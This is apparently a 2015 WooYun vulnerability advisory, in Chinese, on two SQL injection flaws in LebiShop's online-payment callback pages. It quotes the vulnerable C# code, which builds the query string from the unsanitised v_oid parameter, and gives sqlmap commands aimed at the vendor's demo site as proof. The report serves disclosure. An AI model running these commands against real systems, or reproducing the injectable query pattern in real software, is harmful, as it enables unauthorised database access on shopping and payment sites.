当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099855

漏洞标题:LebiShop系统sql注入完结(两处注入)

相关厂商:www.lebi.cn

漏洞作者: hello

提交时间:2015-03-09 12:18

修复时间:2015-06-12 13:32

公开时间:2015-06-12 13:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-08: 细节向核心白帽子及相关领域专家公开
2015-05-18: 细节向普通白帽子公开
2015-05-28: 细节向实习白帽子公开
2015-06-12: 细节向公众公开

简要描述:

LebiShop商城系统最新版SQL注入 demo站点测试成功 最后两处

详细说明:

注入一
\onlinepay\wangyinzaixian\AutoReceive.aspx
源码如下

protected void Page_Load(object sender, EventArgs e)
{
    this.v_oid = base.Request["v_oid"]; //没处理
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.v_oid); //跟进
    if (onlinePay == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else
    {
        string userKey = onlinePay.UserKey;
        this.v_oid = base.Request["v_oid"];
        this.v_pstatus = base.Request["v_pstatus"];
        this.v_pstring = base.Request["v_pstring"];
        this.v_pmode = base.Request["v_pmode"];
        this.v_md5str = base.Request["v_md5str"];
        this.v_amount = base.Request["v_amount"];
        this.v_moneytype = base.Request["v_moneytype"];
        this.remark1 = base.Request["remark1"];
        this.remark2 = base.Request["remark2"];
        if (FormsAuthentication.HashPasswordForStoringInConfigFile(this.v_oid + this.v_pstatus + this.v_amount + this.v_moneytype + userKey, "md5").ToUpper() == this.v_md5str)
        {
            base.Response.Write("ok");
            if (this.v_pstatus.Equals("20"))
            {
                Order.OnlinePaySuccess(this.v_oid, "", false);
            }
        }
        else
        {
            base.Response.Write("error");
        }
    }
}


public static Lebi_OnlinePay GetOnlinePay(string code)
{
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入
}


注入二
地址
\onlinepay\wangyinzaixian\Receive.aspx
源码如下

protected void Page_Load(object sender, EventArgs e)
{
    this.v_oid = base.Request["v_oid"]; //没处理
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.v_oid); //跟进
    if (onlinePay == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else
    {
        string userKey = onlinePay.UserKey;
        this.v_pstatus = base.Request["v_pstatus"];
        this.v_pstring = base.Request["v_pstring"];
        this.v_pmode = base.Request["v_pmode"];
        this.v_md5str = base.Request["v_md5str"];
        this.v_amount = base.Request["v_amount"];
        this.v_moneytype = base.Request["v_moneytype"];
        this.remark1 = base.Request["remark1"];
        this.remark2 = base.Request["remark2"];
        if (FormsAuthentication.HashPasswordForStoringInConfigFile(this.v_oid + this.v_pstatus + this.v_amount + this.v_moneytype + userKey, "md5").ToUpper() == this.v_md5str)
        {
            if (this.v_pstatus.Equals("20"))
            {
                Order.OnlinePaySuccess(this.v_oid, "", true);
            }
        }
        else
        {
            base.Response.Write("校验失败,数据可疑");
        }
    }
}


public static Lebi_OnlinePay GetOnlinePay(string code)
{
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'"));
}


漏洞证明:

注入一
地址
http://demo.lebi.cn/onlinepay/wangyinzaixian/AutoReceive.aspx
sqlmap扫描

sqlmap -u "http://demo.lebi.cn/onlinepay/wangyinzaixian/AutoReceive.aspx" --data "v_oid=1" --dbms "mssql" --technique=T --current-db


526.png


527.png


注入二
http://demo.lebi.cn/onlinepay/wangyinzaixian/Receive.aspx
sqlmap扫描

sqlmap -u "http://demo.lebi.cn/onlinepay/wangyinzaixian/Receive.aspx" --data "v_oid=1" --dbms "mssql" --technique=T --current-db


528.png


529.png

修复方案:

版权声明:转载请注明来源 hello@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-12 13:32

厂商回复:

最新状态:

暂无